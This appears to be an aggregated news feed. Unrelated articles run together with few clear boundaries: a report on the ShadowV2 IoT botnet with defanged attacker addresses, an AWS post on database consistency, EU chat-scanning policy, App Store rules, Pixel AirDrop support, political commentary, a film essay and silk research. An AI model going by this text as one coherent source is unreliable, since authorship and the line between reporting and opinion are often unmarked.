www.bleepingcomputer.com
2025-11-26 22:24:14
A new Mirai-based botnet malware named ‘ShadowV2’ has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities.
Fortinet’s FortiGuard Labs researchers spotted the activity during the major
AWS outage in October
. Although the two incidents are not connected, the botnet was active only for the duration of the outage, which may indicate that it was a test run.
ShadowV2 spread by leveraging at least eight vulnerabilities in multiple IoT products:
Among these flaws, CVE-2024-10914 is a
known-to-be-exploited
command injection flaw impacting EoL D-Link devices, which the vendor announced that it
would not fix
.
Regarding CVE-2024-10915, for which there’s a
NetSecFish report
from November 2024, BleepingComputer initially did not find the vendor's advisory for the flaw. After reaching out to the company, we received confirmation that the issue would not be fixed for the impacted models.
D-Link
updated an older bulletin
to add the particular CVE-ID and
published a new one
referring to the ShadowV2 campaign, to warn users that end-of-life or end-of-support devices are no longer under development and will not receive firmware updates.
CVE-2024-53375, which was also
presented in detail
in November 2024, was reportedly fixed via a beta firmware update.
Various exploits used by ShadowV2
Source: Fortinet
According to FortiGuard Labs researchers, the ShadowV2 attacks originated from 198[.]199[.]72[.]27, and targeted routers, NAS devices, and DVRs across seven sectors, including government, technology, manufacturing, managed security service providers (MSSPs), telecommunications, and education.
The impact was global, with attacks observed in North and South America, Europe, Africa, Asia, and Australia.
The botnet's global impact
Source: Fortinet
The malware identifies itself as "ShadowV2 Build v1.0.0 IoT version," and is similar to the Mirai LZRD variant, the
researchers say
in a report that provides technical details on how ShadowV2 functions.
It is delivered to vulnerable devices through an initial access stage using a downloader script (binary.sh) that fetches it from a server at 81[.]88[.]18[.]108.
Downloader script
Source: Fortinet
It uses XOR-encoded configuration for filesystem paths, User-Agent strings, HTTP headers, and Mirai-style strings.
In terms of functional capabilities, it supports distributed denial-of-service (DDoS) attacks on UDP, TCP, and HTTP protocols, with various flood types for each. The command-and-control (C2) infrastructure triggers these attacks via commands sent to the bots.
DDoS attack trigger
Source: Fortinet
Typically, DDoS botnets make money by renting their firepower to cybercriminals or by directly extorting targets, demanding payments to stop the attacks. However, it is not yet known who is behind ShadowV2 or what their monetization strategy is.
Fortinet shared indicators of compromise (IoCs) to help identify this emerging threat at the bottom of the report, while warning about the importance of keeping firmware updated on IoT devices.
When I started at AWS in 2008, we ran the EC2 control plane on a tree of MySQL databases: a primary to handle writes, a secondary to take over from the primary, a handful of read replicas to scale reads, and some extra replicas for doing latency-insensitive reporting stuff. All of this was linked together with MySQL’s statement-based replication. It worked pretty well day to day, but two major areas of pain have stuck with me ever since: operations were costly, and eventual consistency made things weird.
Since then, managed databases like Aurora MySQL have made relational database operations orders of magnitude easier. Which is great. But eventual consistency is still a feature of most database architectures that try to scale reads. Today, I want to talk about why eventual consistency is a pain, and why we invested heavily in making all reads strongly consistent in Aurora DSQL.
Eventual Consistency is a Pain for Customers
Consider the following piece of code, running against an API exposed by a database-backed service:
id = create_resource(...)
get_resource_state(id, ...)
In the world of read replicas, the latter statement can do something a little baffling: reply ‘
id
does not exist’. The reason for this is simple:
get_resource_state
is a read-only call, likely routed to a read replica, and is racing the write from
create_resource
. If replication wins, this code works as expected. If the client wins, it has to handle the weird sensation of time moving backwards.
Application programmers don’t really have a principled way to work around this, so they end up writing code like this:
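A minimal sketch of that kind of workaround, using the post's placeholder API names (create_resource, get_resource_state, ResourceDoesNotExist); the wrapper function name and the 0.5-second default are just for illustration:

# Sketch only: retry until the replica catches up
import time

def get_resource_state_with_retry(id, sleep_seconds=0.5):
    while True:
        try:
            return get_resource_state(id)      # may hit a stale read replica
        except ResourceDoesNotExist:
            time.sleep(sleep_seconds)          # magic number

id = create_resource(...)
state = get_resource_state_with_retry(id)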
Which fixes the problem. Kinda. Other times, especially if
ResourceDoesNotExist
can be thrown if
id
is deleted, it causes an infinite loop. It also creates more work for client and server, adds latency, and requires the programmer to choose a magic number for
sleep
that balances between the two. Ugly.
But that’s not all. Marc Bowes pointed out that this problem is even more insidious:
Even the retry version could still fail, because the second
get_resource_state
call could go to an entirely different read replica that hasn’t heard the news yet
3
.
Strong consistency avoids this whole problem
1
, ensuring that the first code snippet works as expected.
Eventual Consistency is a Pain for Application Builders
The folks building the service behind that API run into exactly the same problems. To get the benefits of read replicas, application builders need to route as much read traffic as possible to those read replicas. But consider the following code:
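A sketch of the kind of cleanup workflow being described, again using placeholder names from the post (get_attachments_to_thing, remove_attachment); the `thing` variable here is an assumed stand-in for whatever is being cleaned up:

# Sketch only: a small cleanup workflow
attachments = get_attachments_to_thing(thing)
for attachment in attachments:
    remove_attachment(attachment)
# Verify nothing is left behind
assert get_attachments_to_thing(thing) == []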
This is a fairly common code pattern inside microservices. A kind of little workflow that cleans something up. But, in the wild world of eventual consistency, it has at least three possible bugs:
The
assert
could trigger because the second
get_attachments_to_thing
hasn’t heard the news of all the
remove_attachments
.
The
remove_attachment
could fail because it hasn’t heard of one of the attachments listed by
get_attachments_to_thing
.
The first
get_attachments_to_thing
could have an incomplete list because it read stale data, leading to incomplete clean up.
And there are a couple more. The application builder has to avoid these problems by making sure that all reads that are used to trigger later writes are sent to the primary. This requires more logic around routing (a simple “this API is read-only” is not sufficient), and reduces the effectiveness of scaling by reducing traffic that can be sent to replicas.
Eventual Consistency Makes Scaling Harder
Which brings us to our third point: read-modify-write is the canonical transactional workload. That applies to explicit transactions (anything that does an
UPDATE
or
SELECT
followed by a write in a transaction), but also things that do implicit transactions (like the example above). Eventual consistency makes read replicas less effective, because the reads used for read-modify-write can’t, in general, be used for writes without having weird effects.
Imagine a transaction that reads a dog's goodness and writes back goodness + 1. If the read for that read-modify-write is served from a read replica, then the value of goodness may not be changed in the way you expect. Now, the database could internally do something like this:
SELECT goodness AS g, version AS v FROM dogs WHERE name = 'sophie'; -- To read replica
UPDATE dogs SET goodness = g + 1, version = v + 1 WHERE name = 'sophie' AND version = v; -- To primary
And then checking it actually updated a row
2
, but that adds a ton of work.
The nice thing about making scale-out reads strongly consistent is that the query processor can read from any replica, even in read-write transactions. It also doesn’t need to know up-front whether a transaction is read-write or read-only to pick a replica.
How Aurora DSQL Does Consistent Reads with Read Scaling
As I said above, in Aurora DSQL all reads are strongly consistent. DSQL can also scale out reads by adding additional replicas of any hot shards. So how does it ensure that all reads are strongly consistent? Let’s remind ourselves about the basics of the DSQL architecture.
Each storage replica gets its updates from one or more journals. Writes on each journal are strictly monotonic, so once a storage node has seen an update from time $\tau$ it knows it has seen all updates for times $t \leq \tau$. Once it has seen $t \geq \tau$ from all the journals it has subscribed to, it knows that it can return data for time $\tau$ without missing any updates. When a query processor starts a transaction, it picks a timestamp $\tau_{start}$, and every time it does a read from a replica it says to the replica “give me data as of $\tau_{start}$”. If the replica has seen higher timestamps from all journals, it's good to go. If it hasn’t yet, it blocks the read until the write streams catch up.
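As a toy illustration of that rule (not DSQL's actual implementation; the function and parameter names are made up for the sketch):

# A replica can serve a read as of tau_start only once every journal it
# subscribes to has delivered updates at or beyond tau_start.
def can_serve_read(tau_start, journal_high_watermarks):
    return all(hw >= tau_start for hw in journal_high_watermarks)
# If this returns False, the replica blocks the read until the write streams catch up.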
I go into some detail on how $\tau_{start}$ is picked here:
Conclusion
Strong consistency sounds like a complex topic for distributed systems nerds, but is a real thing that applications built on traditional database replication architectures need to start dealing with at modest scale - or even at very small scale if they’re trying to offer high availability. DSQL goes to some internal lengths to make all reads consistent - with the aim of saving application builders and end users from having to deal with this complexity.
I don’t mean to say that eventual consistency is always bad. Latency and connectivity trade-offs do exist (although the
choose-two framing of CAP is bunk
), and eventual consistency has its place. However, that place is probably not in your services or API.
Footnotes
You might point out that this particular problem can be fixed with a weaker set of guarantees, like Read Your Writes, provided by client stickiness. However, this falls down pretty quickly in more complex data models, and cases like IaC where ‘your writes’ is less well defined.
Yes, I know there are other ways to do this.
If we want to get technical, this is because the typical database read replica pattern doesn’t offer
monotonic reads
, where the set of writes a reader sees is increasing over time. Instead, writes at the tip can appear to come and go arbitrarily, as requests are routed to different replicas. See Doug Terry’s
Replicated Data Consistency Explained Through Baseball
for an easy introduction into these terms.
The EU Council reached an agreement on the Child Sexual Abuse Regulation
Voluntary chat scanning remains in the bill despite privacy backlash
The Council now prepares to start negotiations with the Parliament
The EU Council has finally reached an agreement on the controversial Child Sexual Abuse Regulation (CSAR) after more than three years of failed attempts.
Nicknamed
Chat Control
by its critics, the agreement has kept cryptographers, technologists, encrypted service providers, and privacy experts alike in turmoil since its inception.
Presidency after presidency, the bill has taken many shapes. But its most controversial feature is an obligation for all messaging service providers operating in the EU – including those using end-to-end encryption – to scan their users' private chats on the lookout for child sexual abuse material (CSAM).
At the beginning of the month, the Danish Presidency decided to change its approach with a
new compromise text
that makes the chat scanning voluntary, instead. That turned out to be a winning move, with the proposal managing to reach an agreement in the Council on Wednesday, November 26, 2025.
Privacy experts are unlikely to celebrate, though. The decision came a few days after a group of scientists wrote yet another open letter warning that the latest text still "
brings high risks to society
." That's after other privacy experts deemed the new proposal a "
political deception
" rather than an actual fix.
The EU Council is now preparing to start negotiations with the European Parliament, hoping to agree on the final terms of the regulation.
What we know about the Council agreement
(Image credit: Pixabay)
As per the
EU Council announcement
, the new law imposes a series of obligations on digital companies. Under the new rules, online service providers will be required to assess how their platforms could be misused and, based on the results, may need to "implement mitigating measures to counter that risk," the Council notes.
The Council also introduces three risk categories of online services. Those deemed high-risk can be forced "to contribute to the development of technologies to mitigate the risks relating to their services." Voluntary scanning also remains in the bill.
A new EU agency is then tasked to oversee the implementation of the new rules.
"I'm glad that the member states have finally agreed on a way forward that includes a number of obligations for providers of communication services to combat the spread of child sexual abuse material," said Danish Minister for Justice, Peter Hummelgaard.
But concerns about how the agreement threatens our digital rights persist, with one person on the forum,
Hacker News
, saying the Danish "government has today turned the EU into a tool for total surveillance, I don't know if there can be any return from."
As trilogue negotiations approach, the ongoing challenge for legislators remains striking the right balance: halting abuse online without compromising on fundamental rights and strong
encryption
.
November Update to the App Store Review Guidelines
Daring Fireball
developer.apple.com
2025-11-26 21:46:25
Here’s the updated full guideline for section 4.1:
4.1 Copycats
(a) Come up with your own ideas. We know you have them, so make
yours come to life. Don’t simply copy the latest popular app
on the App Store, or make some minor changes to another app’s
name or UI and pass it off as yo...
The
App Review Guidelines
have been revised to support updated policies and to provide clarification. Please review the changes below:
1.2.1(a): This new guideline specifies that creator apps must provide a way for users to identify content that exceeds the app’s age rating, and use an age restriction mechanism based on verified or declared age to limit access by underage users.
2.5.10: This language has been deleted (“Apps should not be submitted with empty ad banners or test advertisements.”).
3.2.2(ix): Clarified that loan apps may not charge a maximum APR higher than 36%, including costs and fees, and may not require repayment in full in 60 days or less.
4.1(c): This new guideline specifies that you cannot use another developer’s icon, brand, or product name in your app’s icon or name, without approval from the developer.
4.7: Clarifies that HTML5 and JavaScript mini apps and mini games are in scope of the guideline.
4.7.2: Clarifies that apps offering software not embedded in the binary may not extend or expose native platform APIs or technologies to the software without prior permission from Apple.
4.7.5: Clarifies that apps offering software not embedded in the binary must provide a way for users to identify content that exceeds the app’s age rating, and use an age restriction mechanism based on verified or declared age to limit access by underage users.
5.1.1(ix): Adds crypto exchanges to the list of apps that provide services in highly regulated fields.
5.1.2(i): Clarifies that you must clearly disclose where personal data will be shared with third parties, including with third-party AI, and obtain explicit permission before doing so.
Google’s Pixel 10 works with AirDrop, and other phones should follow later.
Google's Pixel 10 series now features compatibility with Apple's AirDrop.
Credit:
Ryan Whitwam
Last year, Apple
finally added support
for Rich Communications Services (RCS) texting to its platforms, improving consistency, reliability, and
security
when exchanging green-bubble texts between the competing iPhone and Android ecosystems. Today, Google is announcing another small step forward in interoperability, pointing to a slightly less annoying future for friend groups or households where not everyone owns an iPhone.
Google
has updated
Android’s Quick Share feature to support Apple’s AirDrop, which allows users of Apple devices to share files directly using a local peer-to-peer Wi-Fi connection. Apple devices with AirDrop enabled and set to “everyone for 10 minutes” mode will show up in the Quick Share device list just like another Android phone would, and Android devices that support this new Quick Share version will also show up in the AirDrop menu.
Google will only support this feature on the Pixel 10 series, at least to start. The company is “looking forward to improving the experience and expanding it to more Android devices,” but it didn’t announce anything about a timeline or any hardware or software requirements. Quick Share also won’t work with AirDrop devices working in the default “contacts only” mode, though Google “[welcomes] the opportunity to work with Apple to enable ‘Contacts Only’ mode in the future.” (Reading between the lines: Google and Apple are not currently working together to enable this, and
Google confirmed to The Verge
that Apple hadn’t been involved in this at all.)
Like AirDrop, Google notes that files shared via Quick Share are transferred directly between devices, without being sent to either company’s servers first.
Google shared a little more information in
a separate post about Quick Share’s security
, crediting Android’s use of the memory-safe Rust programming language with making secure file sharing between platforms possible.
“Its compiler enforces strict ownership and borrowing rules at compile time, which guarantees memory safety,” writes Google VP of Platforms Security and Privacy Dave Kleidermacher. “Rust removes entire classes of memory-related bugs. This means our implementation is inherently resilient against attackers attempting to use maliciously crafted data packets to exploit memory errors.”
Why is this happening now?
Google doesn’t mention it in either Quick Share post, but if you’re wondering why it’s suddenly possible for Quick Share to work with AirDrop, it can almost certainly be credited to European Union regulations imposed under the Digital Markets Act (DMA).
Let’s start with how AirDrop works. Like many of Apple’s “
Continuity
” features that rely on wireless communication between devices, AirDrop uses Bluetooth to allow devices to find each other, and a fast peer-to-peer Wi-Fi connection to actually transfer files and other data. This isn’t exotic hardware; all smartphones, tablets, and computers sold today include some flavor of Bluetooth and Wi-Fi.
But to make those Continuity features work, Apple also developed a proprietary protocol called Apple Wireless Direct Link (AWDL) to facilitate the actual connection between devices and the data transfer. Because this wasn’t a standard anyone could use, other companies couldn’t try to make their own wireless sharing features compatible with AirDrop.
But
earlier this year
, the EU
adopted new specification decisions
that required Apple to adopt new interoperable wireless standards, starting in this year’s iOS 26 release. If you don’t want to wade through the regulatory documents,
this post
from cloud services company Ditto is a useful timeline of events written in plainer language.
Setting AirDrop to “everyone for 10 minutes” mode on an iPhone.
Credit:
Andrew Cunningham
The rulings required Apple to add support for the Wi-Fi Alliance’s
Wi-Fi Aware standard
instead of AWDL—and in fact required Apple to deprecate AWDL and to help add its features to Wi-Fi Aware so that any device could benefit from them. This wasn’t quite the imposition it sounded like; Wi-Fi Aware
was developed with Apple’s help
, based on the work Apple had already done on AWDL. But it meant that Apple could no longer keep other companies out of AirDrop by using a functionally similar but private communication protocol instead of the standardized version.
In some ways, Apple’s journey to Wi-Fi Aware recalls the iPhone’s journey to USB-C: first, Apple developed a proprietary port that achieved some of the same goals as USB-C; Apple then contributed work to what would become the standardized USB-C connector; but then the company hesitated to actually adopt the standardized port in its phones until its hand was
forced by regulators
.
In any case, Wi-Fi Aware was added to iOS 26 and iPadOS 26, and
Apple’s developer documentation
lists the specific hardware that supports it (the iPhone 12 and later, and most iPads released within the last three or four years). For Android users, that likely means that Quick Share will only work with AirDrop on those devices, if they’ve been updated to iOS/iPadOS 26 or later. Google
has supported Wi-Fi Aware
in Android since version 8.0, so it should at least theoretically be possible for most modern Android phones to add support for the feature in software updates somewhere down the line.
Apple’s hardware support list also suggests that Android phones
won’t
work with AirDrop on the Mac, since macOS 26 isn't listed as a supported operating system in Apple's Wi-Fi Aware documentation (it's likely not a coincidence that macOS is not considered to be a "gatekeeper" operating system under the DMA, as both iOS and iPadOS are).
If I had to guess why neither of Google’s Quick Share posts mentions Wi-Fi interoperability standards or the DMA, it may be because Google has been
complaining
about
various aspects of the law
and its enforcement since
before it was even passed
(as have many US tech companies designated as gatekeepers by the law). Google has occasionally tried to take advantage of the DMA, as it did
when it argued
that Apple’s iMessage service should be opened up. But it may be that Google doesn’t want to explicitly credit or praise the DMA in its press releases when the company is
facing the possibility of huge fines
under the same law.
The New York Times
reported earlier this week
that EU regulators are considering changes to some of its tech regulations, citing concerns about “overregulation” and “competitiveness,” but that the EU was not currently considering changes to the DMA. For its part, Apple recently
called for the DMA to be repealed entirely
.
Tidbits-Nov.27 -Reader Comments: Thankful for Farmworkers; Mamdani and Wilson – Democratic Socialists and FDR Democrats; Legal Orders; What We Forgot About Socialism; Raising Taxes on the Ultrarich; New Approach to Getting Rid of Citizens United;
Portside
portside.org
2025-11-26 21:24:41
jay
Wed, 11/26/2025 - 16:24
...
Because the ACA is under attack by the Republicans which would impact millions we have to defend it. But the Democrats, who are also wedded to “free markets”, could have created a universal healthcare system but didn’t.
Great article in The Nation, then rerun on Portside, on Trump’s smothering NLRB & thus removing the longstanding arbiter since New Deal of workers’ rights.
Members in great numbers can be trained and deployed with little delay. Then mobilized to reach out to the unorganized workers who surround us on all sides. There is no need for more complicated “studies” to find them, or expensive conferences to delay the task. New organizers must be trained basic-training style, and sent to the workplaces. Older and retired organizer talent must be tapped and mobilized, offsetting today’s dire experience deficit. It’s time for salting to be deployed on a massive scale in multiple industries, joining those salts already in place.
There is no time to wait for perfect targets to be discovered or developed. The unions who come forward can be pushed to do more. Those who sit it out will be bypassed. The labor left must mobilize, to stimulate individual participation as well as to place pressure on the unions to take this necessary action.
(FYI: a press pool spray is a brief photo opportunity, like after a White House meeting.) The Saudi Crown Prince Mohammed bin Salman (MBS) visited the Oval Office and Trump defended MBS’ murder and dismemberment of Washington Post reporter Jamal Khashoggi by saying, “things happen.”
Writing "The Red Riviera" taught me that even flawed socialist systems offered insights into equality, solidarity, and the dignity of everyday life.
Twenty years ago, in November of 2005, Duke University Press published my first book: "
The Red Riviera: Gender, Tourism, and Postsocialism on the Black Sea."
Produced in the wake of socialism's global collapse and the riot of Western triumphalism that ensued, I deployed both qualitative and quantitative methods to advance a simple, but unpopular, argument: For most people in the former Soviet bloc, capitalism sucked.
By writing the "small histories" of men and women laboring in Bulgaria's vibrant tourism industry in the decade following their country's mad dash to embrace democracy and free markets, I explored how and why this small southeastern European country transformed from a relatively predictable, orderly, egalitarian society into a chaotic, lawless world of astonishing inequality and injustice. I wrapped my critiques of the rampant neoliberalism of the "Wild, Wild, East" in thickly descriptive accounts of the lives of chambermaids, bartenders, tour guides, cooks, waitresses, and receptionists. I wanted to show, not tell.
Through a close examination of the shattered careers and broken families of ordinary men and women forced to live through the cataclysmic decade of the 1990s, I asked readers to empathize with the sheer scale of the upheavals of banking collapses, hyperinflation, unemployment, violence, suicide, and the mass emigration of youth. Capitalism promised prosperity and freedom, but for many it delivered little more than poverty and despair. The dislocations of the transition period, as I've documented in my subsequent books, still reverberate today. One can easily draw a straight line from the trauma of the 1990s to the rise of right-wing parties and authoritarian leaders in the region.
Now they’re going after
nurses
and the
boy scouts.
We’re only one year in, folks! By year four? They’ll go after babies. Music. And Providence, R.I. You heard it here first!
The public has supported raising taxes on the ultrarich and corporations for years, but policymakers have not responded. Small increases in taxes on the rich that were instituted during times of Democratic control of Congress and the White House have been consistently swamped by larger tax cuts passed during times of Republican control. This was most recently reflected in the massive budget reconciliation bill pushed through Congress exclusively by Republicans and signed by President Trump. This bill extended the large tax cuts first passed by Trump in 2017 alongside huge new cuts in public spending. This one-step-forward, two-steps-back dynamic has led to large shortfalls of federal revenue relative to both existing and needed public spending.
Raising taxes on the ultrarich and corporations is necessary for both economic and political reasons. Economically, preserving and expanding needed social insurance and public investments will require more revenue. Politically, targeting the ultrarich and corporations as sources of the first tranche of this needed new revenue can restore faith in the broader public that policymakers can force the rich and powerful to make a fair contribution. Once the public has more faith in the overall fairness of the tax system, future debates about taxes can happen on much more constructive ground.
Policymakers should adopt the following measures:
Tax wealth (or the income derived from wealth) at rates closer to those applied to labor earnings. One way to do this is to impose a wealth tax on the top 0.1% of wealthy households.
Restore effective taxation of large wealth dynasties. One way to do this would be to convert the estate tax to a progressive inheritance tax.
Impose a high-income surtax on millionaires.
Raise the top marginal income tax rate back to pre-2017 levels.
Close tax loopholes for the ultrarich and corporations.
...
Between 2008 and 2024, reported “independent” expenditures by outside groups exploded by more than 28-fold — from $144 million to $4.21
billion
. Unreported money also skyrocketed, with dark money groups spending millions influencing the 2024 election.
Most people I talk with assume that the only way to stop corporate and dark money in American politics is either to wait for the Supreme Court to undo
Citizens United
(we could wait a
very
long time) or amend the U.S. Constitution (this is extraordinarily difficult).
But there’s another way! I want to tell you about it because there’s a good chance it will work.
It will be on the ballot next November in Montana. Maybe you can get it on the ballot in your state, too.
Here’s the thing: Individual states — either through their legislators or their citizens wielding ballot initiatives — have the authority to limit corporate political activity and dark money spending, because they determine what
powers
corporations have.
In American law, corporations are creatures of state laws. For more than two centuries, the power to define their form, limits, and privilege has belonged only to the states.
In fact, corporations have no powers at all until a state government grants them some. In the 1819 Supreme Court case
Trustees of Dartmouth College v. Woodward,
Chief Justice John Marshall established that:
“A corporation is an artificial being, invisible, intangible, and existing only in contemplation of law. Being the mere creature of law, it possesses only those properties which the charter of its creation confers upon it, either expressly, or as incidental to its very existence….The objects for which a corporation is created are universally such as the government wishes to promote. They are deemed beneficial to the country; and this benefit constitutes the consideration, and, in most cases, the sole consideration of the grant.”
States don’t
have
to grant corporations the power to spend in politics. In fact, they could decide
not
to give corporations that power.
This isn’t about corporate rights, as the Supreme Court determined in Citizens United. It’s about corporate powers.
When a state exercises its authority to define corporations as entities without the power to spend in politics, it will no longer be relevant whether corporations have a right to spend in politics — because without the power to do so, the right to do so has no meaning.
Delaware’s corporation code already declines to grant private foundations the power to spend in elections.
Importantly, a state that no longer grants its corporations the power to spend in elections also denies that power to corporations chartered in the other 49 states, if they wish to do business in that state.
All a state would need to do is enact a law with a provision something like this:
“Every corporation operating under the laws of this state has all the corporate powers it held previously, except that nothing in this statute grants or recognizes any power to engage in election activity or ballot-issue activity.”
Sound farfetched? Not at all.
In Montana, local organizers have drafted and submitted a constitutional initiative for voters to consider in 2026 — the first step in a movement built to spread nationwide. It would decline to grant all corporations the power to spend in elections.
Called the Transparent Election Initiative, it wouldn’t overturn Citizens United — it would negate the consequences of Citizens United....
Note to governors and state legislators: The Citizens United decision is enormously unpopular. Some 75 percent of Americans disapprove of it. But most of you haven’t realized that you have the authority to make Citizens United irrelevant. My recommendation to you: use that authority to rid the nation of Citizens United.
The Montana Plan, a breakthrough legal strategy, will stop corporate and dark money cold. It's how Montanans will beat Citizens United and take back our politics. Learn about what it is and how it's headed toward Montana's 2026 ballot. Montana can do it, and your state can too!
What is The Montana Plan?
The Montana Plan uses the state's authority to define what powers corporations get and stops giving them the power to spend in our politics. Montana can do it, and your state can too! Learn how!
A Power Move
For more than a century, Montana, like every state, has given all corporations the power to do everything legal. Turns out, we don't have to do that.
It's Up to Us
States don't have to give corporations the power to spend in politics. So The Montana Plan simply stops granting that power.
Bypasses Citizens United
Citizens United held that corporations had a right to spend in politics. But if a corporation doesn't have the power to act, that right can't be used. That makes Citizens United irrelevant.
How Montana Can Act
Montana's laws include three powerful provisions that give us a clear path toward keeping corporations out of our politics:
1 Power to Alter or Revoke
Montana law explicitly allows the state to change or repeal its corporate code at any time, for any reason. No corporation has a permanent claim to any power—or to existence!
2 Universal Application
Changes to Montana's corporation law apply to all corporations—new and existing alike. Every corporation can be redefined by rewriting the law behind it.
3 Out-of-State Corporation Limits
Montana plays fair: Out-of-state corporations can only exercise the same powers here that Montana corporations have. If Montana corporations can't spend in our politics, neither can they.
Together, these provisions mean Montana has full authority to no longer grant corporations the power to spend in our politics—across the board, and for good. We'll need your help. The Transparent Election Initiative is spearheading a ballot initiative that gives Montana voters the ability to implement The Montana Plan. Volunteer, engage, and sign the petition when ready!
Out of nowhere, Google brought cross-platform AirDrop support to the Pixel 10 this week, allowing the company’s latest lineup of flagships to safely and securely send photos, files, and more to the iPhone. While it initially seemed like this was a rogue move made by Google to coerce Apple into another boundary-breaking decision, it might actually be part of the repercussions that also led to USB-C on iPhone and the adoption of RCS.
If you’ve been scratching your head trying to figure out just how — not to mention why — Google was able to get this up and running, the answer might be a little simpler than you might think. While this certainly brought back memories of, say, Beeper’s attempt at getting iMessage up and running on Android two years ago, as well as Palm’s war of attrition over iTunes support in the earliest days of the Pre, it sounds like this particular example was far less hostile towards Apple than any of its predecessors, all thanks to some of the changes made by the EU.
As reported by Ars Technica, the answer to this week’s mysterious Quick Share upgrade lies in the EU’s interoperability requirements under the DMA. The ruling from the European Commission pushed Apple to begin supporting interoperable wireless standards beginning with this year’s set of OS upgrades, replacing the previous proprietary standard the company used to power its various Continuity features. That forced Apple to add support for the Wi-Fi Alliance’s Wi-Fi Aware standard of multi-directional file sharing, at the cost of completely phasing out its previous walled-in protocol.
So yes, while Apple wasn’t officially involved with opening up AirDrop clients to Android, it’s a little unfair to paint the company as having no involvement at all. Thanks to actions Apple was required to take under the DMA in Europe, Pixel 10 users — and soon, Android users at large — now have effectively native AirDrop support through Quick Share without any sacrifice to security, so long as the hardware has proper support for Wi-Fi Aware.
Still, just because this isn’t the quiet workaround some of us might’ve assumed Google was relying on doesn’t mean you should expect Apple to join in on the fun any time soon. As Ars Technica points out in its report, Europe has been rethinking its heavy-handed approach to tech firms, specifically in reaction to the absence of AI-centric firms in the region — and Apple, for its part, still wants the DMA revoked.
Try out AirDrop while your phone still supports it, Pixel 10 owners. While it seems unlikely, you never know if this could disappear overnight.
Why 90s Movies Feel More Alive Than Anything on Netflix
I was rewatching The Silence of the Lambs the other night, and something hit me hard. This movie, made in 1991, feels more alive, more gripping, more
real
than most things coming out today. And it got me thinking: why do 80s and 90s movies seem so much better than what we're getting now?
There's something about the way older films were crafted that modern cinema seems to have lost. Take Goodfellas from 1990. Scorsese doesn't just tell you a story about mobsters, he pulls you into their world. The tracking shot through the Copacabana, the narration that feels like a conversation, the way violence erupts suddenly and brutally. You feel the seduction of that lifestyle and the paranoia that comes with it. Every frame has purpose. Every scene builds character. Compare that to The Irishman from 2019, which is actually good but feels bloated, overly long, relying too heavily on “de-aging” technology that never quite convinces you.
Or think about Pulp Fiction from 1994. Tarantino took narrative structure and shattered it into pieces, then reassembled it into something that shouldn't work but does, brilliantly. The dialogue crackles. The characters feel lived-in. Vincent and Jules aren't just hitmen, they're more like philosophers debating foot massages and divine intervention between murders. Now look at something like Bullet Train from 2022. It's stylish, sure, but it feels like it's trying too hard to be quirky. The characters are archetypes. The dialogue is clever for cleverness' sake. It's entertaining in the moment but fades away from your memory almost immediately.
Even The Silence of the Lambs itself proves the point. Every interaction between Clarice and Hannibal is a chess match. You feel her vulnerability, his intelligence, the way he gets under her skin. The horror isn't in jump scares, it's in the psychological warfare. Modern thrillers like The Woman in the Window from 2021 have twists and atmosphere, but they lack that deep character work that makes you actually care what happens.
I think the difference comes down to this: older movies took risks. They trusted audiences to pay attention, to feel something, to think. Scorsese and Tarantino had visions and the freedom to execute them without endless studio interference. They weren't chasing demographics or worrying about franchise potential. They were making
films
, not products.
Today's cinema often feels designed by committee, optimized for streaming algorithms and opening weekend numbers rather than lasting impact. We have better technology, way bigger budgets, more sophisticated effects, but somewhere along the way, we forgot that movies are supposed to move us, not just occupy our time between scrolling sessions.
Maybe I'm just nostalgic. Maybe I'm romanticizing the past. But when I finish a good movie, I can sit there thinking about it for hours, even days, depending on the movie. When I finish most modern blockbusters, I'm already thinking about dinner. And that difference, I think, says everything.
Inspired by Spider-Man, scientists recreate web-slinging technology
We've all had moments as kids watching Spider-Man, imagining what it might feel like to shoot a thread into the air and have it grab something, bringing it closer. A group of researchers at Tufts University has moved that idea from comic panels into the lab. Their new work shows a fluid silk material that shoots from a needle, solidifies mid-air, sticks to objects, and can lift items far heavier than itself.
The whole story began with silk, not the kind spiders spin, but the silk taken from moth cocoons, which are boiled down into their basic protein building blocks known as fibroin. The silk fibroin solution can be pushed through narrow-bore needles to make thin threads, and when exposed to solvents like ethanol or acetone, it slowly starts turning into a semi-solid hydrogel.
The problem is that this transformation usually takes hours. Spider silk hardens almost instantly as it leaves the glands, which gives spiders the precise control that engineers have struggled to match.
Then a little accident helped make a breakthrough. “I was working on a project making extremely strong adhesives using silk fibroin, and while I was cleaning my glassware with acetone, I noticed a web-like material forming on the bottom of the glass,” said Marco Lo Presti, research assistant professor at Tufts.
It turned out that dopamine, a key component they were already using for adhesive work, dramatically sped up the solidification process. When dopamine is mixed into the solution, it appears to pull water away from the silk proteins, so the liquid fibroin doesn’t need hours to set. Instead, once it meets the organic solvent, it snaps into a fiber in just seconds.
From there, the team built a coaxial needle system where the fibroin–dopamine solution moves through the center while a layer of acetone flows around it. As the stream leaves the nozzle, the acetone triggers rapid solidification and then evaporates in mid-air, allowing the forming fiber to latch onto objects it makes contact with. What comes out is a thread that can shoot through open air, stick on contact, and hold surprising amounts of weight.
To boost performance, the team mixed the fibroin–dopamine solution with chitosan, a material derived from insect exoskeletons, which increased tensile strength up to 200 times. A borate buffer made the fibers roughly eighteen times stickier. Depending on the needle bore, the resulting fiber diameter can be as thin as a human hair or closer to half a millimeter.
In testing, the demonstrations took on a playful look as the fibers picked up a cocoon, a steel bolt, a tube floating on water, a scalpel half-buried in sand, and even a block of wood from around 12 centimeters away. Under various conditions, the fibers can lift objects more than 80 times their own weight. For a jet of liquid silk that hardens mid-air, that lifting strength is remarkable.
Silk solution jets solidify into fibers that stick to and lift multiple steel bolts from a sand-filled petri dish. (Marco Lo Presti, Tufts University)
Spiders don’t actually shoot their silk into the air. They make contact with a surface first, attach a strand, then pull and arrange their webs with careful choreography. As Lo Presti explained, “Spiders cannot shoot their web… we are demonstrating a way to shoot a fiber from a device, then adhere to and pick up an object from a distance. Rather than presenting this work as a bio-inspired material, it’s really a superhero-inspired material.”
Natural spider silk is still about a thousand times stronger than the man-made fiber in this study, but the method opens a path for controlled shooting, instant solidification, and strong adhesion. With further innovations, it could grow into something far more capable and find its place in many different technological applications.
“We can be inspired by nature. We can be inspired by comics and science fiction. In this case, we wanted to reverse engineer our silk material to behave the way nature originally designed it, and comic book writers imagined it,” said Fiorenzo Omenetto, Frank C. Doble Professor of Engineering at Tufts University and director of the Silklab.
